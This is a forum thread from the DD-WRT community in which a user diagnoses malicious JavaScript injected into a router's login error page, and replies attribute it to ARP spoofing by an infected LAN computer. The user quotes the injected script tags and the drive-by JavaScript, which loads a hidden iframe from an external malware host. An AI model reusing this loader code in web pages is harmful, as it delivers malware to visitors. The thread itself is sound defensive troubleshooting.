Posted: Fri Oct 17, 2008 17:58 Post subject: Trojan/virus PC is infecting DD-WRT. Help
This has happend me before, and Im not sure how they are doing it. I have a WRT600N router flashed with dd-wrt svn build 10431. When I try to get onto a restricted page on the router (ie Administration) I rappidly get the pink screen that says:
Code:
Authorization required. please note that the default username is "root" in all newer releases
Analyzing the html code of it, it references to another page to try to load a javascript
Code:
<script language="javascript" SRC="http://sun.ads2008.info/vip.js"></script> <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>
Authorization required. please note that the default username is "root" in all newer releases
</BODY></HTML>
The url it tries to load is the Status_Router.asp.
I can however still access the router via telnet and execute command via shell, but from web access is unsable, and the page it redirects to tries to install malware if used with IE. Any idea how this trojans/virus are infecting the dd-wrt ?? At first I thought it would be dns poisoning, but this version has the already patched dnsmask....
UPDATES:
* note: the admin password wasnt the default one.
** after analyzing the pages it takes, it takes you to a japanesse/chinesse server
Heres the html it outputs now (points to different url of the javascript)
Code:
<script language="javascript" type="text/javascript" src="http://vc.zaqaab.cn/vc.js"></script> <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>
Authorization required. please note that the default username is "root" in all newer releases
</BODY></HTML>
the javascript content is
Code:
var cookieString=document.cookie;
var start=cookieString.indexOf("cookiesleepv");
if(start!=-1){}else{var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="cookiesleepv=test;expires="+expires.toGMTString();
document.write("<iframe src=http://vc.zaqaab.cn/vc.htm width=50 height=0 border=0></iframe>");}
I have changed the default http internal port to 8080, changed the default username (root) and password, disabled UPNP, snmp, and all unnecesary services.
Im running
Firmware: DD-WRT v24-sp2 (11/25/0 mega
on a Linksys WRT600N (since it was the last stable build for this unit).
Ive tried different browsers, machines, and same happends. Any other way to debug why it wont even let me log in to the router (when I click on a tab, instead of asking me for the username/password it takes me directly to the pink 401 page with the infected javascript.
The cause is a trojan horse (virus) on another computer in your network!
This other computer is telling your PC that it is the gateway to the internet by modifying its hardware address (MAC). Your computer is in consequence sending all traffic to the infected PC which forwards it to the internet and filters it in order to put its malicious code.
You can find out which computer is the evil one by typing following into your command line:
arp -a
In the appearing table search for a double assigned physical address which is once assigned to the gateway IP address and once assigned to another IP.
Find out which computer is the other IP and you will have the virus host.
Scan that one for virus and malware (we are just about to conduct that scan).
And I guess that the JS it injects make something break on the DDWRT and thats why it responds with an invalid username/password
Hi! Maybe you should change your antivirus. I use a version that makes me no problem and I really have no virus. So I recommand you to use it. You can download it from here kaspersky security 7
Joined: 24 Aug 2009 Posts: 2070 Location: South Florida
Posted: Tue Jun 01, 2010 12:07 Post subject:
Best A/V I have ever used is Avast. Not only is it free, but it will do a boot-time scan as well as screen saver scans...Great piece of software. Been using it for 3 years..
http://www.avast.com/index#tab2 _________________ Optware, the Right Way
Asus RT-AC68U
Asus RT-N66U
Asus RT-N10
Asus RT-N12
Asus RT-N16 x5
Asus WL520gU
Engenious ECB350
Linksys WRT600Nv1.1
Linksys WRT610Nv1
Linksys E2000
Netgear WNDR3300
SonicWall NSA220W
SonicWall TZ215W
SonicWall TZ205W
SonicWall TZ105W
Joined: 04 Jan 2007 Posts: 11564 Location: Wherever the wind blows- North America
Posted: Tue Jun 01, 2010 12:43 Post subject:
dave-levy wrote:
just to be clear here, does this occurence mean the software is actually loaded into router memory, or is this purely a pc problem?
This is really an archaic post (2008)....but the way I understand it was if the PC is infected, then when you flashed the router, it injected the FW code with a virus....someone correct me if I am wrong.
So...by protecting your PC, you can also protect your router....there are other malware problems with router FWs....but BS had patched the FW to remedy this. Read the announcements about the Milworm Exploit. (its in my recommended FW post)
redhawk _________________ The only stupid question....is the unasked one.
This is really an archaic post (2008)....but the way I understand it was if the PC is infected, then when you flashed the router, it injected the FW code with a virus....someone correct me if I am wrong.
no. it hast nothing to do with dd-wrt. a other computer on the lan spoofed the arp entries of the gateway (in this case a dd-wrt router) and then proxied + modified all loaded html pages to infect more computers.
I'm not saying it's impossible, but it's very unlikely the DD-WRT itself is infected. Reading the way the OP is analyzing and drawing conclusions it becomes even less and less likely it has anything to do with DD-WRT. _________________ Asus RT16N + OTRW
Kingston 4GB USB-disk 128 MB swap + 1.4GB ext3 on /opt + 2 GB ext3 on /mnt
Copperjet 1616 modem in ZipB-config
Asterisk, pixelserv & Pound running on router
Another Asus RT16N as WDS-bridge